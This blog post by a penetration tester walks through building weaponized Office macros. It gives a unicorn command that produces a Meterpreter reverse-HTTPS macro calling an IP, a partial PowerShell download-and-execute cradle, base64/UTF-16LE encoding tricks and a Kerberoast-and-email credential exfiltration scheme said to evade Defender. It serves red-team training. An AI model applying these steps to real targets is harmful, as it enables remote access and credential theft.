Office macros for years have been the choice of many as a mechanism to gain a foothold, and personally I have been using macros as a delivery method in pen tests for many years.
Let’s be honest, macro writing is tricky, and before the amazing and magical unicorn https://github.com/trustedsec/unicorn, empire https://github.com/EmpireProject/Empire , and veil https://github.com/Veil-Framework/Veil-Evasion/blob/master/modules/payloads/auxiliary/macro_converter.py the creation of simulated malicious macros was a daunting task.
I like unicorn, because it makes creating PS payloads simple. To create an office macro in unicorn you simply have to run the following.
root@kali:~/unicorn/v3.5.3# python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro
And a few seconds later the following two files are created, unicorn.rc which can be used to configure the MSF handler and powershell_attack.txt which contains the macro, simply open the powershell_attack.txt file and then copy it, open word, Developer, Visual Basic, right click on ThisDocument and Insert Module, then paste the contents of powershell_attack.txt in, a final tweak is required, the top line of the macro Sub Auto_Open() requires the underscore to be deleted as such Sub AutoOpen() and then your macro is ready to be saved and used as required.
So I had been using unicorn for a few years, during this time I seen a few odd problems here and there, mostly due to formatting after updates, but no major problems, that was until I tried the cobalt strike macro option in unicorn v3.5.3 after creating I pasted the macro output into office 2010 word and instantly got the following error. “Too many line continuations” So I googled it, and learned something.
Your code has more than 25 physical lines joined with line-continuation characters.
OK so the outputted macro had more than 25 lines joined together, so how did I try and fix this, let’s look at an example.
Directly below details an extract of VBA code which has been subjected to base64 encoding, the important section is the underscore at the end of the lines combined with the & character at the start of the second line, this is a line continuation.
& "AIABsAHOAGEAbQBlACABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQB" _
And if you have more than 25 you get an error and your macro won’t run.
So how do you fix this? Well first I logged the above error on the unicorn git page, https://github.com/trustedsec/unicorn/issues/96 and then I tried to manually tweak the macro.
Deleting the line continuation and reattach as single lines should work, and while this idea sounded simple and under most cases it would work, it did not work with the output of the unicorn script, from labbing I later found out that there seems to be a limit on line length in VB.
So this got me thinking, could I figure out how to write my own script to base64 encode and output the results as a usable macro, and the answer was yes, was it complex? Yes, I’m happy to admit I’m no coding genius, lots went wrong, I swore a bit, but I learned a lot of things during the way.
The result (I don’t care what you all think lol) it’s a bash script (wrapper, but I made it so i’m happy) that takes a PS one liner and spits out an office macro.
Have others made such a thing before, yes, but trying to make something from scratch teaches you far more than googling for a finished solution.
Video showing it working.
I tried placing the bash script in here, but WP formats code horribly, so placed it on git hub.
To run it simply, type bash Macro.sh and then give it the file you want it to convert
root@kali:~/Desktop# bash Macro.sh
Feed it your PS file: /root/Desktop/PS_OneLiner1
The PS one liner I use to convert is, see link directly below;
To use the above you need a gmail account, make a test one as you need to add credentials to the script, to enable it to login and send and receive emails (I get it’s wrong to add credentials to a script, but this is a proof of concept, lab idea, can you harvest DA creds and send them to remote destination, and the answer is yes.) Also you need to, under your test created google account click on Security and tick on “Less secure app access” this allows devices to login, in this case powershell but it’s the same if you use outlook with gmail.
I have detailed the above one liner before see here https://1337red.wordpress.com/powershell-one-liners-that-make-you-go-hmmm/ the Kerberoast script was created by @harmj0y and I use the one bundled with Empire. The email automation, I painfully wrote, sections taken from a mass of other blogs, the above one works in PSv2 which is what I was going for.
So what did I learn? well first off, when attempting to writing a macro based from a PS script, you just get so many errors, so, so many errors, and you just want to cry and give up, this is down to the formatting, while you can run a simple command such as powershell.exe ipconfig / all > test.txt in VBA (and most examples on other blogs only show a simple syntax) if you try to do something such as “powershell -ep bypass -c “IEX (New-Object System.Net.WebClient).DownloadString(‘ you’re in for a load of stress, so how do you fix this? Base64 the one liner, this streamlines the formatting ;0) but it’s not just that simple i’m sorry to say, if you just base64 the one liner, it wont be encoded for PS, to make it work you also need to set the destination charset to UTF-16LE, this proved to be a few hours of challenge, with all sec problems, any answer creates more questions. Nod to byt3bl33d3r (Love CME) for the following post on base64 PS
So I tested the above on a Windows 7 VB machine, I still find Windows 10 slower to use, but for completeness I also tested it on Windows 10, with defender on.
Microsoft Windows [Version 10.0.16299.846]
(c) 2017 Microsoft Corporation. All rights reserved.
Host Name: WIN10AD
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.16299 N/A Build 16299
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Defender settings – Updated on day of testing, Threat definition version 1.283.488.0.
And I still received the email with hashes, so bypasses AMSI.
If you got this far, cheers for reading, and sorry no refunds on the 10 mins of life you spent reading this. Now go lab something ;0)